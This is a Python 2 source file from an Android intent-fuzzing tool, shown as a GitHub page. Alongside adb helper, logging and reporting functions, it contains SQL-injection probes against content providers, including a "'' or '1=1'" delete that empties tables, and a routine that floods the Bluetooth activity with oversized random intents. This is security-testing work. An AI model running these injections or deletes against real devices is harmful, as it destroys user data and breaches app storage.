-
Notifications
You must be signed in to change notification settings - Fork 33
Expand file tree
/
Copy pathcommon.py
More file actions
465 lines (395 loc) · 15.1 KB
/
common.py
File metadata and controls
465 lines (395 loc) · 15.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
#!/usr/bin/env python
# Common methods for intent and broadcast.
#
# Copyright (C) 2015 Intel Corporation
# Author: Andreea Brindusa Proca <andreea.brindusa.proca@intel.com>
# Author: Razvan-Costin Ionescu <razvan.ionescu@intel.com>
# Author: Bogdan Alexandru Ungureanu <bogdanx.a.ungureanu@intel.com>
#
# Licensed under the MIT license, see COPYING.MIT for details
import os
import sys
import re
from commands import *
from datetime import datetime
from threading import Thread
import random
from intent_bifuz import *
import ast
import itertools
import filecmp
import shutil
def delete_query(device,content,table):
projection_query="shell content query --uri " + content + " --projection " + '"' "* FROM sqlite_master WHERE type='table';--" + '"'
run_inadb(device,projection_query + "> " + os.getcwd() + "/sql_file.txt")
projection_query="shell content query --uri " + content + " --projection '* FROM "+table +";--'"
with open("sql_file.txt", 'r') as sql_file:
for line in sql_file:
tbl_name=line.split("tbl_name=")
tbl_name=tbl_name[1].split(",")
tbl_name=tbl_name[0]
if (tbl_name==table):
lines=line.split("(");
sql_param=lines[1].split(",")
for i in sql_param:
if (i.find("PRIMARY KEY")==-1):
i=i.split(" ")
name=i[0]
delete_query="shell content delete --uri " + content + " --where " + '"' + name + "='' or '1=1'" + '"'
print "adb "+ delete_query + "\n"
run_inadb(device,delete_query)
run_inadb(device,projection_query + " > " + os.getcwd() + "/sql_final_table.txt")
with open("sql_final_table.txt", 'r') as sql_file:
for line in sql_file:
print line
if line.find("No result found.")>-1:
return True
return False
def insert_query(device,content,table):
projection_query="shell content query --uri " + content + " --projection " + '"' "* FROM sqlite_master WHERE type='table';--" + '"'
run_inadb(device,projection_query + "> " + os.getcwd() + "/sql_file.txt")
query="shell content query --uri " + content + " --projection '* FROM "+table +";--'"
run_inadb(device,query + " > " + os.getcwd() + "/sql_initial_table.txt")
with open("sql_file.txt", 'r') as sql_file:
for line in sql_file:
tbl_name=line.split("tbl_name=")
tbl_name=tbl_name[1].split(",")
tbl_name=tbl_name[0]
if (tbl_name==table):
lines=line.split("(");
sql_param=lines[1].split(",")
insert_query="shell content insert --uri " + content
for i in sql_param:
if (i.find("PRIMARY KEY")==-1):
i=i.split(" ")
name=i[0]
sql_type=i[1]
if sql_type=="BLOB":
insert_query=insert_query + " --bind " + name+":b:"+"NEWVALUE"
elif sql_type=="TEXT":
insert_query=insert_query + " --bind " + name+":s:"+"NEWVALUE"
print "adb "+insert_query + "\n"
print run_inadb(device,insert_query)
run_inadb(device,projection_query + "> " + os.getcwd() + "/sql_final_table.txt")
return filecmp.cmp('sql_initial_table.txt', 'sql_final_table.txt')
return False
def get_devices_list():
#returns the list of all DUTs connected
devices = getoutput("adb devices").split("\n")
devices_list = []
index = [i for i in range(len(devices)) if 'List' in devices[i]]
if len(index) == 0:
return False
#devices are found using adb devices command
#and they can be identified either by IP, or by their serial number
for ips in devices[index[0] + 1:-1]:
devices_list.append(ips.split("\t")[0].split(":")[0])
if not devices_list:
return False
return devices_list
def string_generator(size=8, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def set_logdir(ip, fuzz_type):
'''
Create the log directory: serial no of the device, timestamp , intents type.
Returns the generated name.
'''
current_dir = os.getcwd()
new_folder = raw_input('\nDevice ' + ip + \
': Insert the name of the logs folder: ')
if not new_folder:
time = datetime.now().strftime('%m%d_%H-%M')
if not os.path.isdir(current_dir + "/LOGS_" + ip + "_" + time + \
"_" + fuzz_type):
os.mkdir(current_dir + "/LOGS_" + ip + "_" + time + \
"_" + fuzz_type)
new_folder = current_dir + "/LOGS_" + ip + "_" + time + \
"_" + fuzz_type
elif(new_folder and not os.path.isdir(new_folder)):
os.mkdir(new_folder)
return new_folder
def get_package_list(ip, log_dir, selected_packages):
'''
Get the list of the packages selected by the user.
'''
lines = []
if selected_packages == 'all':
run_inadb(ip, "shell pm list packages > " + log_dir + \
"/list_packages.txt")
output = run_inadb(ip, "shell pm list packages")
if output is not None:
lines.extend(output.split('\r\n'))
lines[-1] = lines[-1].replace('\r', '')
else:
partial_pks = re.split(r'[, ]+', selected_packages)
for pkg in partial_pks:
output = run_inadb(ip, 'shell pm list packages | grep ' + pkg)
run_inadb(ip, 'shell pm list packages | grep ' + pkg + " >> " +\
log_dir + '/list_packages.txt')
if output is not None:
lines.extend(output.split('\r\n'))
lines[-1] = lines[-1].replace('\r', '')
lines = [x for x in lines if x]
print lines
return lines
def get_root_path(intents_file):
'''
Get the root path of the intent file.
Used for running intents from the seed files.
'''
if intents_file[-1] == '/':
intents_file = intents_file[:-1]
intents_file = intents_file[:intents_file.rfind('/')]
return intents_file
def log_in_logcat(ip, log):
if "." in ip:
log_command = "adb -s %s:5555 shell log -p f -t %s" % (ip, str(log))
else:
log_command = "adb -s %s shell log -p f -t %s" % (ip, str(log))
resp_l = getoutput(log_command)
return resp_l
def save_logcat(ip):
logcat_cmd = "adb -s %s logcat -v time *:F > logcat_%s" % (ip, ip)
os.system(logcat_cmd)
def run_inadb(ip, command):
'''
Verify the type of the device, send the command and get output.
'''
if not verify_availability(ip):
return "Unavailable device."
if ("." in ip):
output = getoutput('adb -s %s:5555 %s' % (ip, command))
else:
output = getoutput('adb -s %s %s' % (ip, command))
return output
def verify_availability(ip):
'''
Verify if a device is still available.
'''
if ("." in ip):
output = getoutput('adb -s %s:5555 get-state' % (ip))
else:
output = getoutput('adb -s %s get-state' % (ip))
if 'unknown' in output:
return False
else:
return True
'''
def parse_session_logs(session):
files = filter(os.path.isfile, os.listdir(session))
files = [f for f in files if f.startswith('e_')]
intents = []
for f in files:
with open(f, 'r') as error_file:
for line in error_file:
if line.startswith('F/BIFUZ_'):
intents.append(line)
break
return intents
'''
def parse_session_logs(session):
'''
For every error file collect the line that generated the error.
Returns a list of crashing intents.
'''
files = [session + '/' + f for f in os.listdir(session) \
if f.startswith('e_')]
intents = []
for f in files:
#if logcat -c is not working, you will find the crashy intent
#at the end of the error file; that is why reversed is used
for line in reversed(open(f).readlines()):
if line.startswith('F/BIFUZ_'):
intents.append(line)
break
return intents
def trim_session(session_one, session_two):
'''
Trim the session log directory.
Used when generating the delta report between 2 running sessions.
'''
sessions = [session_one, session_two]
for s in range(len(sessions)):
if sessions[s][-1] == '/':
sessions[s] = sessions[s][:-1]
sessions[s] = sessions[s][sessions[s].rfind('/') + 1:]
return sessions
def delta_reports(session_one, session_two):
'''
Analyse both sessions and save in a file the unique errors.
'''
if not os.path.isdir(session_one) or not os.path.isdir(session_two):
print "Verify if both fuzzing session exist."
return False
else:
intents_s1 = parse_session_logs(session_one)
intents_s2 = parse_session_logs(session_two)
if not intents_s1 and not intents_s2:
print "None of this sessions have crashed intents. Stop!"
return True
if session_one[-1] == '/':
session_one = session_one[:-1]
root_path = session_one[:session_one.rfind('/') + 1]
sessions_name = trim_session(session_one, session_two)
deltafile = root_path + "delta__" + sessions_name[0] +\
"__to__" + sessions_name[1]
with open(deltafile, 'w') as f:
f.write("Intents that crashed for session one: %s \n" % session_one)
f.write("\n".join(intents_s1))
f.write("\nIntents that crashed for session two: %s \n" % session_two)
f.write("\n".join(intents_s2))
print "The delta report is stored here: %s" % deltafile
return True
def reproducibility(intents_f, partial_name, crashed_intent):
'''
Save all the intents up to the crashing intent in a seed file.
'''
root_path_reproducibility = get_root_path(intents_f)
root_index = intents_f.rfind('/all_')
root_path = intents_f[:root_index + 1]
all_crashes = []
before_crash_f = open(root_path_reproducibility + "/" + partial_name + ".sh", 'w')
intents_file = open(intents_f, 'r')
for line in intents_file:
before_crash_f.write(line)
if line.strip() in crashed_intent.strip():
break
before_crash_f.close()
intents_file.close()
return True
def get_apks_list(ip, apk_names):
'''
Get all the apks from the DUT or only the ones selected by the user
'''
output = run_inadb(ip, "shell su -c 'ls /system/app'")
#output = run_inadb(ip, 'shell ls /system/app')
apps_list = output.split("\r\n")
for apk_name in apk_names:
match_apps = [app for app in apps_list if apk_name.lower in app.lower]
def get_apks(ip, package_name):
'''
Get the apk of the application from the device.
Decode the apk using apktool.
Get the uris found in the application.
'''
# get_apks_list(ip[0])
command_resp = run_inadb(ip[0], "pull " + "/data/app/" + package_name + ".apk .")
print command_resp
if command_resp.startswith("Unavailable device"):
print command_resp
return False
outp_c = getoutput("apktool decode " + package_name + ".apk")
if not outp_c.startswith('I:'):
print outp_c
return False
provider_uris = []
provider_content = getoutput("grep -r 'content://' " + package_name)
provider_content = provider_content.split('\n')
for line in provider_content:
pattern = re.search("(content\:\/\/.*)\"", line)
try:
uri = pattern.group(1)
provider_uris.append(uri)
except:
continue
#print list(set(provider_uris))
return list(set(provider_uris))
def buffer_overflow(ip):
print "BUFFER OVERFLOW ATTEMPT against BLUETOOTH"
#function for generating intents of random sizes; it needs adb root access on the device (for the moment)
rand_int_f = random.randint(-2147483648,2147483647) #flag might be an integer between -2147483648 and 2147483647
rand_size_a = random.randint(1,131071)
rand_size_c = random.randint(1,131071)
rand_size_d = random.randint(1,131071)
rand_size_ek = random.randint(1,131071)
rand_size_ev = random.randint(1,131071)
os.system("touch buffer.sh")
#packages
#com.mwr.example.sieve/.MainLoginActivity
#com.google.android.calendar/com.android.calendar.AllInOneActivity
#com.android.bluetooth/.opp.BluetoothOppLauncherActivity
fileName = "buffer"
#hardcoded package activity
pack_act = "com.android.bluetooth/.opp.BluetoothOppLauncherActivity"
with open(fileName,"w") as f:
f.write("am start -n "+pack_act+" -f "+ str(rand_int_f)+ \
" -a "+string_generator(rand_size_a)+" -c "+string_generator(rand_size_c)+" -d "+string_generator(rand_size_d) + \
" -e "+string_generator(rand_size_ek)+" "+string_generator(rand_size_ev))
#f.write("am start -n com.google.android.calendar/com.android.calendar.AllInOneActivity -a "+string_generator(rand_size_a))
os.system("chmod 777 "+fileName)
os.system("adb -s %s push "% (ip)+" "+fileName+" /data/data/")
os.system("adb -s %s shell sh /data/data/buffer"%(ip))
print str(rand_int_f) + " rand_int_f"
print str(rand_size_a) + " rand_size_a"
print str(rand_size_c) + " rand_size_c"
print str(rand_size_d) + " rand_size_d"
print str(rand_size_ek) + " rand_size_ek"
print str(rand_size_ev) + " rand_size_ev"
def parse_string_for_lists(string_input,ip):
'''
Function for parsing the template's lines and looking for lists received as parameters
'''
output=[]
if "[" not in string_input:
#if there is no list in the template
output.append(string_input)
else:
#if there are lists specified within the template
list_pattern = '\[[^\]]*\]'
list_strings = re.findall(list_pattern, string_input)
i = 0
arg_lists_maping = {}
string_template = string_input
arg_lists = []
for list in list_strings:
key = '$' + str(i) + '$'
i += 1
string_template = string_template.replace(list, key)
arg_lists_maping[key] = ast.literal_eval(list)
arg_lists.append(ast.literal_eval(list))
for element in itertools.product(*arg_lists):
i = 0
gen_string = string_template
for arg in element:
key = '$' + str(i) + '$'
i += 1
gen_string = gen_string.replace(key, arg)
#print gen_string
output.append(gen_string)
return output
def fill_default_values(parameter):
'''
Get the standard categories, extra_keys, extra_types,
flags and actions.
'''
global activity_actions
global categories
global extra_keys
global extra_types
global flags
global path_txt
path_txt = os.getcwd() + "/txts/"
if parameter=="cat":
with open(path_txt + "categories.txt") as f:
categories = f.read().splitlines()
return categories
elif parameter=="ek":
with open(path_txt + "extra_keys.txt") as f:
extra_keys = f.read().splitlines()
return extra_keys
elif parameter=="et":
with open(path_txt + "extra_types.txt") as f:
extra_types = f.read().splitlines()
return extra_types
elif parameter=="flag":
with open(path_txt + "flags.txt") as f:
flags = f.read().splitlines()
for i in range(len(flags)):
index_fl = flags[i].index(':')
if index_fl > 0:
flags[i] = flags[i][index_fl + 1:]
return flags
elif parameter=="act":
with open(path_txt + "activity_actions.txt") as f:
activity_actions = f.read().splitlines()
return activity_actions